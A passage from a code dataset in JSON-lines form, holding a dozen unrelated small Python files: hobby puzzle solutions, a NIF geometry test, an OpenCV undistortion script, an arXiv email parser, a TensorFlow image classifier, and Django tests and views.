(INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# ***** END LICENSE BLOCK *****\n\nimport math\nimport mathutils\n\nimport nose\n\nfrom pyffi.utils.withref import ref\nfrom pyffi.formats.nif import NifFormat\n\n\n\"\"\"Vertex coordinates for testing.\"\"\"\nb_verts = {\n (-7.5, 7.5, 3.5),\n (7.5, 3.75, 1.75),\n (7.5, -3.75, -1.75),\n (7.5, 3.75, -1.75),\n (-7.5, 7.5, -3.5),\n (-7.5, -7.5, 3.5),\n (7.5, -3.75, 1.75),\n (-7.5, -7.5, -3.5),\n }\n\n\ndef n_create_blocks(n_data):\n n_ninode_1 = NifFormat.NiNode()\n n_nitrishape_1 = NifFormat.NiTriShape()\n n_nitrishapedata_1 = NifFormat.NiTriShapeData()\n n_data.roots = [n_ninode_1]\n\n with ref(n_ninode_1) as n_ninode:\n n_ninode.name = b'Scene Root'\n n_ninode.flags = 14\n with ref(n_ninode.rotation) as n_matrix33:\n n_matrix33.m_11 = 1\n n_matrix33.m_22 = 1\n n_matrix33.m_33 = 1\n n_ninode.scale = 1\n n_ninode.num_children = 1\n n_ninode.children.update_size()\n n_ninode.children[0] = n_nitrishape_1\n \n with ref(n_nitrishape_1) as n_nitrishape:\n n_nitrishape.name = b'Cube'\n n_nitrishape.flags = 14\n with ref(n_nitrishape.translation) as n_vector3:\n n_vector3.x = 20\n n_vector3.y = 20\n n_vector3.z = 20\n with ref(n_nitrishape.rotation) as n_matrix33:\n n_matrix33.m_11 = 0.0\n n_matrix33.m_21 = -0.5\n n_matrix33.m_31 = 0.866025\n n_matrix33.m_12 = 0.866025\n n_matrix33.m_22 = -0.433013\n n_matrix33.m_32 = -0.25\n n_matrix33.m_13 = 0.5\n n_matrix33.m_23 = 0.75\n n_matrix33.m_33 = 0.433012\n assert(n_matrix33.is_rotation()) # make sure in case we change values:\n n_nitrishape.scale = 0.75\n n_nitrishape.data = n_nitrishapedata_1\n \n with ref(n_nitrishapedata_1) as n_nitrishapedata:\n n_nitrishapedata.has_vertices = True\n n_nitrishapedata.num_vertices = 8\n n_nitrishapedata.vertices.update_size()\n with ref(n_nitrishapedata.vertices[0]) as n_vector3:\n n_vector3.x = 7.5\n n_vector3.y = 3.75\n n_vector3.z = -1.75\n with ref(n_nitrishapedata.vertices[1]) as n_vector3:\n n_vector3.x = 7.5\n n_vector3.y = -3.75\n n_vector3.z = -1.75\n with ref(n_nitrishapedata.vertices[2]) as n_vector3:\n n_vector3.x = -7.5\n n_vector3.y = -7.5\n n_vector3.z = -3.5\n with ref(n_nitrishapedata.vertices[3]) as n_vector3:\n n_vector3.x = -7.5\n n_vector3.y = 7.5\n n_vector3.z = -3.5\n with ref(n_nitrishapedata.vertices[4]) as n_vector3:\n n_vector3.x = 7.5\n n_vector3.y = 3.75\n n_vector3.z = 1.75\n with ref(n_nitrishapedata.vertices[5]) as n_vector3:\n n_vector3.x = -7.5\n n_vector3.y = 7.5\n n_vector3.z = 3.5\n with ref(n_nitrishapedata.vertices[6]) as n_vector3:\n n_vector3.x = -7.5\n n_vector3.y = -7.5\n n_vector3.z = 3.5\n with ref(n_nitrishapedata.vertices[7]) as n_vector3:\n n_vector3.x = 7.5\n n_vector3.y = -3.75\n n_vector3.z = 1.75\n \n n_nitrishapedata.has_normals = True\n n_nitrishapedata.normals.update_size()\n with ref(n_nitrishapedata.normals[0]) as n_vector3:\n n_vector3.x = 0.669057\n n_vector3.y = 0.4991\n n_vector3.z = -0.550676\n with ref(n_nitrishapedata.normals[1]) as n_vector3:\n n_vector3.x = 0.669057\n n_vector3.y = -0.4991\n n_vector3.z = -0.550676\n with ref(n_nitrishapedata.normals[2]) as n_vector3:\n n_vector3.x = -0.481826\n n_vector3.y = -0.64098\n n_vector3.z = -0.59743\n with ref(n_nitrishapedata.normals[3]) as n_vector3:\n n_vector3.x = -0.481826\n n_vector3.y = 0.64098\n n_vector3.z = -0.59743\n with ref(n_nitrishapedata.normals[4]) as n_vector3:\n n_vector3.x = 0.669057\n n_vector3.y = 0.4991\n n_vector3.z = 0.550676\n with ref(n_nitrishapedata.normals[5]) as n_vector3:\n n_vector3.x = -0.481826\n n_vector3.y = 0.64098\n n_vector3.z = 0.59743\n with ref(n_nitrishapedata.normals[6]) as n_vector3:\n n_vector3.x = -0.481826\n n_vector3.y = -0.64098\n n_vector3.z = 0.59743\n with ref(n_nitrishapedata.normals[7]) as n_vector3:\n n_vector3.x = 0.669027\n n_vector3.y = -0.4991\n n_vector3.z = 0.550676\n \n with ref(n_nitrishapedata.center) as n_vector3:\n n_vector3.x = 4.76837e-07\n n_vector3.y = 2.14577e-06\n \n n_nitrishapedata.radius = 11.1692\n n_nitrishapedata.consistency_flags = NifFormat.ConsistencyType.CT_STATIC\n \n n_nitrishapedata.num_triangles = 12\n n_nitrishapedata.num_triangle_points = 36\n n_nitrishapedata.has_triangles = True\n n_nitrishapedata.triangles.update_size()\n with ref(n_nitrishapedata.triangles[0]) as n_triangle:\n n_triangle.v_2 = 1\n n_triangle.v_3 = 2\n with ref(n_nitrishapedata.triangles[1]) as n_triangle:\n n_triangle.v_2 = 2\n n_triangle.v_3 = 3\n with ref(n_nitrishapedata.triangles[2]) as n_triangle:\n n_triangle.v_1 = 4\n n_triangle.v_2 = 5\n n_triangle.v_3 = 6\n with ref(n_nitrishapedata.triangles[3]) as n_triangle:\n n_triangle.v_1 = 4\n n_triangle.v_2 = 6\n n_triangle.v_3 = 7\n with ref(n_nitrishapedata.triangles[4]) as n_triangle:\n n_triangle.v_2 = 4\n n_triangle.v_3 = 7\n with ref(n_nitrishapedata.triangles[5]) as n_triangle:\n n_triangle.v_2 = 7\n n_triangle.v_3 = 1\n with ref(n_nitrishapedata.triangles[6]) as n_triangle:\n n_triangle.v_1 = 1\n n_triangle.v_2 = 7\n n_triangle.v_3 = 6\n with ref(n_nitrishapedata.triangles[7]) as n_triangle:\n n_triangle.v_1 = 1\n n_triangle.v_2 = 6\n n_triangle.v_3 = 2\n with ref(n_nitrishapedata.triangles[8]) as n_triangle:\n n_triangle.v_1 = 2\n n_triangle.v_2 = 6\n n_triangle.v_3 = 5\n with ref(n_nitrishapedata.triangles[9]) as n_triangle:\n n_triangle.v_1 = 2\n n_triangle.v_2 = 5\n n_triangle.v_3 = 3\n with ref(n_nitrishapedata.triangles[10]) as n_triangle:\n n_triangle.v_1 = 4\n n_triangle.v_3 = 3\n with ref(n_nitrishapedata.triangles[11]) as n_triangle:\n n_triangle.v_1 = 4\n n_triangle.v_2 = 3\n n_triangle.v_3 = 5\n return n_data\n\ndef n_check_trishape(n_trishape):\n nose.tools.assert_is_instance(n_trishape, NifFormat.NiTriShape)\n n_check_transform(n_trishape)\n \n n_trishapedata = n_trishape.data\n n_check_trishape_data(n_trishapedata)\n n_check_8_vertices(n_trishapedata)\n\ndef n_check_transform(n_trishape): \n nose.tools.assert_equal(n_trishape.translation.as_tuple(),(20.0, 20.0, 20.0)) # location\n \n n_rot_eul = mathutils.Matrix(n_trishape.rotation.as_tuple()).to_euler()\n nose.tools.assert_equal((n_rot_eul.x - math.radians(30.0)) < NifFormat.EPSILON, True) # x rotation\n nose.tools.assert_equal((n_rot_eul.y - math.radians(60.0)) < NifFormat.EPSILON, True) # y rotation\n nose.tools.assert_equal((n_rot_eul.z - math.radians(90.0)) < NifFormat.EPSILON, True) # z rotation\n \n nose.tools.assert_equal(n_trishape.scale - 0.75 < NifFormat.EPSILON, True) # scale\n\ndef n_check_trishape_data(n_trishape_data):\n nose.tools.assert_true(n_trishape_data.has_vertices)\n \n nose.tools.assert_equal(n_trishape_data.num_triangles, 12)\n \n #TODO FIXME\n # nose.tools.assert_equal(n_trishape_data.consistency_flags, NifFormat.ConsistencyType.CT_STATIC)\n \n \ndef n_check_8_vertices(n_trishape_data):\n nose.tools.assert_equal(n_trishape_data.num_vertices, 8)\n verts = {\n tuple(round(co, 4) for co in vert.as_list())\n for vert in n_trishape_data.vertices\n }\n nose.tools.assert_set_equal(verts, b_verts)\n \n #See Issue #26\n #nose.tools.assert_true(n_trishape_data.has_normals)\n #nose.tools.assert_equal(n_trishape_data.num_normals, 8)\n\n \n #TODO: Additional checks needed.\n \n #TriData\n # Flags: blender - Continue, Maya - Triangles, Pyffi - Bound.\n # radius:\n","sub_path":"testframework/integration/geometry/trishape/n_gen_geometry.py","file_name":"n_gen_geometry.py","file_ext":"py","file_size_in_byte":10407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"505079988","text":"import sys\n\t\ndef countarr(jolts):\n\tpaths = [1]\n\tfor i in range(1, len(jolts)):\n\t\tp = paths[i-1]\t\n\t\tj = i-2\n\t\twhile j >= 0 and jolts[i] - jolts[j] <= 3:\n\t\t\tp += paths[j]\n\t\t\tj -= 1\n\t\tpaths.append(p)\n\n\treturn paths[-1]\n\njolts = []\nones = 0\nthrees = 1\nfor line in sys.stdin:\n\tjolts.append(int(line))\n\njolts.sort()\n\nprint(jolts)\n\ni = 0\nfor j in jolts:\n\tif j-i == 1:\n\t\tones += 1\n\telif j-i == 3:\n\t\tthrees +=1\n\ti = j\nprint(ones*threes)\n\njolts.insert(0,0)\njolts.append(max(jolts)+3)\nprint(countarr(jolts))","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"603810877","text":"import random\nimport csv\n\ndef loadObstacles():\n# start by trying to load our data file.\n try:\n f = open(\"obstacles.csv\", \"r\")\n\n except IOError as e:\n return []\n\n else:\n print(\"Obstacles file opened successfully\")\n obstacles = []\n for line in csv.reader(f):\n obstacles.append(line)\n f.close()\n return obstacles\n\ndef throwDice(player):\n d1 = random.randint(1,6)\n d2 = random.randint(1,6)\n #d1 = int(input(\"First dice: \"))\n #d2 = int(input(\"Second dice: \"))\n\n if d1 == d2:\n score = -(d1+d2)\n print (player + ': double ' + str(d1) + ': returns ' + str(score))\n else:\n score = d1+d2\n print (player +' ' +str(d1) + ',' +str(d2) +': returns ' +str(score))\n return score\n\ndef checkForObstacles(position, player, obstacles):\n for obstacle in obstacles:\n if int(obstacle[0]) == position:\n print (player +\": obstacle @ \" +str(position) +\", value \" + obstacle[1])\n return position + int(obstacle[1])\n return position\n\ndef turn(position, player, obstacles):\n position = position + throwDice(player)\n position = checkForObstacles(position, player, obstacles)\n if position < 1:\n position = 1\n return position\n\ndef winner(position):\n if position > 48:\n return True\n else:\n return False\n\n\n# program starts here\n# Players A and B both start in square 1\nA = 1\nB = 1\n\nobstacles = loadObstacles()\nprint(obstacles)\n\nwhile True:\n A = turn(A, \"A\", obstacles)\n if winner(A):\n print ('Player A scored ' + str(A) + ', Player A has won')\n break\n else:\n print ('Player A new position: ' + str(A))\n B = turn(B, \"B\", obstacles)\n if winner(B):\n print ('Player B scored ' + str(B) + ', Player B has won')\n break\n else:\n print ('Player B new position: ' + str(B))\n","sub_path":"python/3/codeWithoutGrid.py","file_name":"codeWithoutGrid.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"115668255","text":"import pickle, glob\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n# Read in the saved objpoints and imgpoints\nDIR = './camera_cal/'\nPklF = DIR+\"cameraCalibPickle.p\"\nx,y = 9,6\n\ndist_pickle = pickle.load( open( PklF, \"rb\" ) )\ndist = dist_pickle[\"dist\"]\nmtx = dist_pickle[\"mtx\"]\n\nimages = glob.glob('./test_images/test*.jpg')[:]\nfor idx, fnm in enumerate(images):\n print(idx, fnm)\n Img = cv2.imread(fnm) #DIR+'test_image1.jpg')\n undistort = cv2.undistort(Img, mtx, dist, None, mtx)\n\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))\n f.tight_layout()\n ax1.imshow(Img)\n ax1.set_title('Original Image', fontsize=50)\n ax2.imshow(undistort)\n ax2.set_title('Undistorted Image', fontsize=50)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show()\n","sub_path":"undistortTestImgs.py","file_name":"undistortTestImgs.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"43854458","text":"'''\narxiv.py\nDaniel Mentiplay, 2018.\n'''\n\nimport urllib.request\n\nclass Arxiv:\n '''\n Contains a list of entries from my daily arXiv email.\n '''\n\n def __init__(self):\n\n self.date = None\n self.entries = None\n self.categories = None\n\n self._read_data_from_file()\n self._get_categories()\n\n def _read_data_from_file(self):\n\n entries = list()\n\n filename = 'original_msg.txt'\n\n in_entries = False\n in_abstract = False\n in_title = False\n in_authors = False\n in_comments = False\n\n keys = ['label', 'date', 'title', 'comments', 'categories', 'abstract',\n 'journal-ref', 'doi']\n\n with open(filename, 'r') as file:\n\n prevLine = ''\n\n for line in file:\n line = line.rstrip('\\n')\n\n if line == 78*'-':\n in_entries = True\n continue\n\n if not in_entries:\n continue\n\n if ' received from' in line:\n words = line.split(' ')\n self.date = words[3]\n\n if '%%--%%' in line:\n break\n\n if 'arXiv:' in line:\n entry = {key: None for key in keys}\n entry['label'] = line[:16]\n continue\n\n if 'Date:' in line:\n words = line.split(' ')\n entry['date'] = words[2] + ' ' + words[3] + ' ' + words[4]\n continue\n\n if 'Title:' in line:\n in_title = True\n entry['title'] = line[7:]\n continue\n\n if in_title:\n if line[0:2] == ' ':\n entry['title'] += line[1:]\n continue\n else:\n in_title = False\n\n if 'Authors:' in line:\n in_authors = True\n authors_line = line[9:]\n continue\n\n if in_authors:\n if line[0:2] == ' ':\n authors_line += line[1:]\n continue\n else:\n entry['authors'] = authors_line.split(', ')\n in_authors = False\n\n if 'Categories:' in line:\n entry['categories'] = line[12:].split(' ')\n continue\n\n if 'Comments:' in line:\n in_comments = True\n entry['comments'] = line[10:]\n continue\n\n if in_comments:\n if line[0:2] == ' ':\n entry['comments'] = entry['comments'] + ' ' + line\n continue\n else:\n in_comments = False\n\n if 'DOI:' in line:\n entry['doi'] = line[5:]\n continue\n\n if 'Journal-ref:' in line:\n entry['journal-ref'] = line[13:]\n continue\n\n if prevLine == r'\\\\' and line[0:2] == ' ':\n in_abstract = True\n entry['abstract'] = line[2:]\n continue\n\n if in_abstract:\n if line[0:2] != r'\\\\':\n entry['abstract'] += ' ' + line\n continue\n else:\n in_abstract = False\n words = line.split(' ')\n entry['url'] = words[2]\n entries.append(entry)\n continue\n\n prevLine = line\n\n self.entries = entries\n\n def _get_categories(self):\n '''Put all categories into a set'''\n\n categories = set()\n for entry in self.entries:\n for category in entry['categories']:\n categories.add(category)\n\n self.categories = categories\n\n def get_articles_from_category(self, category):\n '''Put all article labels with a particular category into a set'''\n\n if category not in self.categories:\n raise ValueError(f'{category} not in available categories')\n\n articles = set()\n for entry in self.entries:\n for category_ in entry['categories']:\n if category_ == category:\n articles.add(entry['label'])\n\n return articles\n\n def get_url_from_label(self, label):\n '''Get url from article label'''\n\n url = None\n for entry in self.entries:\n if label == entry['label']:\n url = entry['url']\n\n if url is None:\n raise ValueError(f'{label} not found')\n else:\n return url\n\ndef pdf_url_from_article_url(url):\n '''Get arXiv pdf url from abstract url'''\n\n return url[:18] + 'pdf' + url[21:] + '.pdf'\n\ndef download_pdf_from_article_url(url):\n '''Download arXiv pdf'''\n\n url = pdf_url_from_article_url(url)\n\n filename = url.split(\"/\")[-1]\n\n with urllib.request.urlopen(url) as response, open(filename, 'wb') as outfile:\n data = response.read()\n outfile.write(data)\n","sub_path":"arxiv.py","file_name":"arxiv.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"353558404","text":"import re\n\nPROD = True\n\n\nr = re.compile(r\"^[^0-9]+([0-9]+)$\")\ncre = re.compile(r\"^([a-z]+)[\\s]+([0-9]+)[\\s]+([0-9]+)[\\s]+([0-9]+)$\")\n\nregs = [0] * 6\n\n\ndef call(op, a, b, c):\n if op == \"seti\":\n regs[c] = a\n elif op == \"setr\":\n regs[c] = regs[a]\n elif op == \"addi\":\n regs[c] = regs[a] + b\n elif op == \"addr\":\n regs[c] = regs[a] + regs[b]\n elif op == \"muli\":\n regs[c] = regs[a] * b\n elif op == \"mulr\":\n regs[c] = regs[a] * regs[b]\n elif op == \"bani\":\n regs[c] = regs[a] & b\n elif op == \"banr\":\n regs[c] = regs[a] & regs[b]\n elif op == \"bori\":\n regs[c] = regs[a] | b\n elif op == \"borr\":\n regs[c] = regs[a] | regs[b]\n elif op == \"gtir\":\n regs[c] = 1 if a > regs[b] else 0\n elif op == \"gtri\":\n regs[c] = 1 if regs[a] > b else 0\n elif op == \"gtrr\":\n regs[c] = 1 if regs[a] > regs[b] else 0\n elif op == \"eqir\":\n regs[c] = 1 if a == regs[b] else 0\n elif op == \"eqri\":\n regs[c] = 1 if regs[a] == b else 0\n elif op == \"eqrr\":\n regs[c] = 1 if regs[a] == regs[b] else 0\n\n\ndef step(prog):\n if regs[ip] >= len(prog):\n return False\n s = \"ip={} \".format(regs[ip]) + str(regs)\n op, a, b, c = prog[regs[ip]]\n s += \" {} {} {} {} \".format(op, a, b, c)\n call(op, a, b, c)\n s += str(regs)\n print(s)\n return True\n\n\nwith open(\"input.txt\") as f:\n text = f.read().splitlines()\n if not PROD:\n text = \"\"\"# ip 0\nseti 5 0 1\nseti 6 0 2\naddi 0 1 0\naddr 1 2 3\nsetr 1 0 0\nseti 8 0 4\nseti 9 0 5\"\"\".splitlines()\n\n ip = int(r.match(text[0]).group(1))\n\n prog = []\n for l in text[1:]:\n m = cre.match(l)\n prog.append((m.group(1), int(m.group(2)),\n int(m.group(3)), int(m.group(4))))\n\n regs[0] = 1\n regs = [0, 10551292, 9, 10551293, 0, 1]\n #regs = [0, 10551292, 13, 10551293, 1, 10551293]\n\n i = 0\n while step(prog):\n regs[ip] += 1\n i += 1\n if i > 50:\n break\n\n print(regs[0])\n'''\nEXPECT:\nip=0 [0, 0, 0, 0, 0, 0] seti 5 0 1 [0, 5, 0, 0, 0, 0]\nip=1 [1, 5, 0, 0, 0, 0] seti 6 0 2 [1, 5, 6, 0, 0, 0]\nip=2 [2, 5, 6, 0, 0, 0] addi 0 1 0 [3, 5, 6, 0, 0, 0]\nip=4 [4, 5, 6, 0, 0, 0] setr 1 0 0 [5, 5, 6, 0, 0, 0]\nip=6 [6, 5, 6, 0, 0, 0] seti 9 0 5 [6, 5, 6, 0, 0, 9]\n'''\n","sub_path":"day19/day19pt2.py","file_name":"day19pt2.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"636921583","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 12 08:16:45 2017\n\n@author: George\n\"\"\"\n\nimport pickle\nimport math\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tf_utils import predict_buildings_7layers, convert_to_one_hot\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\nimport glob\nimport copy\nfrom scipy import stats\nfrom sklearn.neighbors import KernelDensity\n\n#load parameters\nfileNumber = \"20171019-103626_7layer\"\nfilename_pickle = r\"C:\\\\Google Drive\\\\code\\\\python_code\\\\tensorFlow\\\\buildingIdentification\\\\parameters\\\\parameter_\" + fileNumber\n\nwith open(filename_pickle, 'rb') as handle:\n test_parameters = pickle.load(handle)\n\n\n\nmapPath = r\"D:\\\\neuralNet_data\\\\AerialImageDataset\\\\AerialImageDataset\\\\test\\\\mapSections2\\\\\"\ndataList = glob.glob(r\"D:\\neuralNet_data\\AerialImageDataset\\AerialImageDataset\\test\\mapSections2\\*.jpg\")\nnumberFiles = len(dataList)\n\nnum_px = 100\nimageVectorSize = num_px * num_px * 3\n\ndataList = []\nfor i in range(numberFiles):\n dataList.append(mapPath + \"IMG-\" +str(i) + \".jpg\")\n\n\n#trainList = dataList[0:8000]\ntestList = dataList[0:numberFiles]\n\ndef label(fileName):\n if \"notBuilding\" in fileName:\n return 0\n return 1\n\ndef processImage(fname, num_px):\n image = np.array(ndimage.imread(fname, flatten=False))\n image = scipy.misc.imresize(image, size=(num_px,num_px)).reshape((num_px,num_px,3))\n return image\n\n# Loading the data (cat/non-cat)\nX_test_orig = np.array([np.array(processImage(fname, num_px)) for fname in testList])\nY_test_orig = np.array([np.array(label(fname)) for fname in testList])\nY_test_orig = Y_test_orig.reshape(1,Y_test_orig.shape[0])\nclasses = np.array(('notBuilding','building'), dtype=\"str\")\n\nnum_labels = np.size(classes)\n\n# Flatten the training and test images\nX_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T\n# Normalize image vectors\nX_test = X_test_flatten/255.\n# Convert training and test labels to one hot matrices\nY_test = convert_to_one_hot(Y_test_orig, num_labels)\n\n\nprint (\"number of test examples = \" + str(X_test.shape[1]))\nprint (\"X_test shape: \" + str(X_test.shape))\nprint (\"Y_test shape: \" + str(Y_test.shape))\n\ndef create_placeholders(n_x, n_y):\n \"\"\"\n Creates the placeholders for the tensorflow session.\n \n Arguments:\n n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288)\n n_y -- scalar, number of classes (from 0 to 5, so -> 6)\n \n Returns:\n X -- placeholder for the data input, of shape [n_x, None] and dtype \"float\"\n Y -- placeholder for the input labels, of shape [n_y, None] and dtype \"float\"\n \n Tips:\n - You will use None because it let's us be flexible on the number of examples you will for the placeholders.\n In fact, the number of examples during test/train is different.\n \"\"\"\n\n ### START CODE HERE ### (approx. 2 lines)\n X = tf.placeholder(tf.float32,shape = [n_x, None])\n Y = tf.placeholder(tf.float32,shape = [n_y, None])\n ### END CODE HERE ###\n \n return X, Y\n\n\nimage_predictions = predict_buildings_7layers(X_test, test_parameters, X_test.shape[1], imageVectorSize)\n\narray = image_predictions.reshape((100,100))\n#array = np.flipud(array)\narray = np.uint8(array*255)\n\n#img = Image.open(r\"D:\\\\neuralNet_data\\\\AerialImageDataset\\\\AerialImageDataset\\\\test\\\\cropped\\\\IMG-11.jpg\")\nimg = Image.open(r\"D:\\\\neuralNet_data\\\\AerialImageDataset\\\\AerialImageDataset\\\\test\\\\cropped\\\\IMG-425.jpg\")\nimg2 = copy.deepcopy(img)\npiece = Image.fromarray(array)\nimg.paste(piece,(50,50))\n\n\nfig1 = plt.figure(1)\nplt.imshow(img)\nfig1.show()\n\nfig2 = plt.figure(2)\nplt.imshow(img2)\nfig2.show()\n\n\n# =============================================================================\n# #cluster analysis\n# def getPoints(array):\n# xAns = []\n# yAns = []\n# for x in range(array.shape[0]):\n# for y in range(array.shape[1]):\n# if array[x,y] > 0:\n# xAns.append(x)\n# yAns.append(y)\n# return np.array(xAns), np.array(yAns)\n# \n# def kde2D(x, y, bandwidth, xbins=100j, ybins=100j, **kwargs): \n# \"\"\"Build 2D kernel density estimate (KDE).\"\"\"\n# \n# # create grid of sample locations (default: 100x100)\n# xx, yy = np.mgrid[x.min():x.max():xbins, \n# y.min():y.max():ybins]\n# \n# xy_sample = np.vstack([yy.ravel(), xx.ravel()]).T\n# xy_train = np.vstack([y, x]).T\n# \n# kde_skl = KernelDensity(bandwidth=bandwidth, **kwargs)\n# kde_skl.fit(xy_train)\n# \n# # score_samples() returns the log-likelihood of the samples\n# z = np.exp(kde_skl.score_samples(xy_sample))\n# return xx, yy, np.reshape(z, xx.shape) \n# \n# xArray, yArray = getPoints(array)\n# kernel = stats.gaussian_kde(xArray,yArray)\n# \n# xx, yy, zz = kde2D(xArray,yArray,1.0)\n# plt.pcolormesh(xx, yy, zz)\n# plt.scatter(xArray, yArray, s=2, facecolor='white')\n# =============================================================================\n","sub_path":"tensorFlow/buildingIdentification/analyzeImage_7layers 2.py","file_name":"analyzeImage_7layers 2.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"407301518","text":"from tkinter import *\nimport threading\n\ndef hello():\n while True:\n print(\"HELLOOO\")\ndef fine():\n while True:\n print(\"FINEeeeeeee\")\n\nth= threading.Thread(target=fine)\nth.start()\nwindow= Tk()\nbut1= Button(window, text= \"HEllo\", command=hello)\nbut1.pack()\n\n\n\nwindow.mainloop()","sub_path":"NeethuWork/Threaded/2buts.py","file_name":"2buts.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"267496436","text":"def getY(x):\n y = 0\n while x > 0:\n y += x % 10\n x //= 10\n return y\n\na, n, m = map(int, input().split())\ncnt = 0\nfor y in range(1, 73):\n x = 1\n for t in range(1, n + 1):\n x *= (y + a)\n if x <= m and getY(x) == y:\n cnt += 1\n\nprint(cnt)\n","sub_path":"AOJ/0384/0384.py","file_name":"0384.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"377963349","text":"from django.test import TestCase\nfrom django.utils import timezone\n\nfrom social.models import Post\nfrom users.models import Profile, User\n\n\nclass PostTestModel(TestCase):\n @classmethod\n def setUpTestData(cls):\n \"\"\"setUpTestData: Run once to set up non-modified data for all class methods.\"\"\"\n cls.user = User.objects.create(email='kornel@mail.com',\n username='kornel1')\n cls.profile = cls.user.profile\n cls.profile.bio = 'Northen man'\n cls.profile.city = 'Stockholm'\n cls.profile.website = 'facebook.com'\n\n cls.post = Post.objects.create(\n author=cls.profile,\n content='Learning tests in Django Framework',\n date_posted=timezone.now(),\n location='Tomaszów Mazowiecki')\n\n def setUp(self):\n \"\"\"setUp: Run once for every test method to setup clean data.\"\"\"\n pass\n\n def test_content_label(self):\n field_label = self.post._meta.get_field('content').verbose_name\n self.assertEquals(field_label, 'content')\n self.assertNotEquals(field_label, 'location')\n\n def test_location_max_length(self):\n max_length = self.post._meta.get_field('location').max_length\n self.assertEqual(max_length, 40)\n\n def test_object_name_post_id(self):\n expected_object_name = f'Post#{self.post.id}'\n self.assertEquals(expected_object_name, str(self.post))\n\n def test_get_absolute_url(self):\n self.assertEquals(self.post.get_absolute_url(), '/post/1/')\n","sub_path":"social/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"214033528","text":"# 봉우리\r\n\r\n# 내가 작성한 코드\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, 1, 0, -1]\r\n\r\nn = int(input())\r\narr = [list(map(int, input().split())) for _ in range(n)]\r\n# 입력 받은 2차원 리스트의 첫 번째 행과 마지막 행에 모든 원소가 0인 리스트 삽입\r\narr.insert(0, [0]*n)\r\narr.append([0]*n)\r\n\r\n# 입력 받은 2차원 리스트의 첫 번째 열과 마지막 열에 원소 0을 삽입\r\nfor i in arr:\r\n i.insert(0, 0)\r\n i.append(0)\r\n# 위 과정으로 문제에서 주어진 격자판 완성\r\n\r\ncnt = 0\r\nfor i in range(1, n+1):\r\n for j in range(1, n+1):\r\n check = 0\r\n for k in range(4): # 19 line ~ 23 line을 2줄로 작성 가능! - all() 함수: 인자가 참이면 True를 return\r\n if arr[i][j] > arr[i + dx[k]][j + dy[k]]: # dx, dy 리스트를 이용하여 현재 좌표 기준 상하좌우 좌표와 크기를 비교\r\n check += 1\r\n if check == 4:\r\n cnt += 1\r\nprint(cnt)\r\n\r\n\r\n# 강의 코드\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, 1, 0, -1]\r\n# 어떤 좌표를 상하좌우 방향으로 이동시킬 수 있음\r\n\r\nn = int(input())\r\na = [list[map(int, input().split())] for _ in range(n)]\r\na.insert(0, [0] * n) # 이차원 리스트 a의 0번 행에 0으로 초기화된 리스트를 삽입\r\na.append([0] * n) # 0으로 초기화된 리스트를 이차원 리스트 a의 마지막 행에 삽입\r\nfor x in a: # 열의 맨 앞과 끝에 0을 추가\r\n x.insert(0, 0)\r\n x.append(0)\r\n\r\ncnt = 0\r\nfor i in range(1, n+1):\r\n for j in range(1, n+1):\r\n # all()은 괄호 내의 표현이 모두 참인 경우 true\r\n if all(a[i][j] > a[i+dx[k]][j+dy[k]] for k in range(4)): # 상하좌우보다 큰 값이 확인\r\n cnt += 1\r\nprint(cnt)","sub_path":"Inflearn/Search&Simulation/Search&Simulation_Peaks.py","file_name":"Search&Simulation_Peaks.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"165998052","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views.generic.base import View\nfrom oms_cms.backend.languages.models import Lang\n\nfrom .models import Pages\n\n\nclass Page(View):\n \"\"\"Вывод страницы\"\"\"\n def get(self, request, lang=None, slug=None):\n if lang is None:\n lang = Lang.objects.get(is_default=True).slug\n if slug is not None:\n if Lang.objects.filter(slug=slug).exists():\n page = get_object_or_404(Pages, slug__isnull=True, lang__slug=slug, published=True)\n else:\n page = get_object_or_404(Pages, 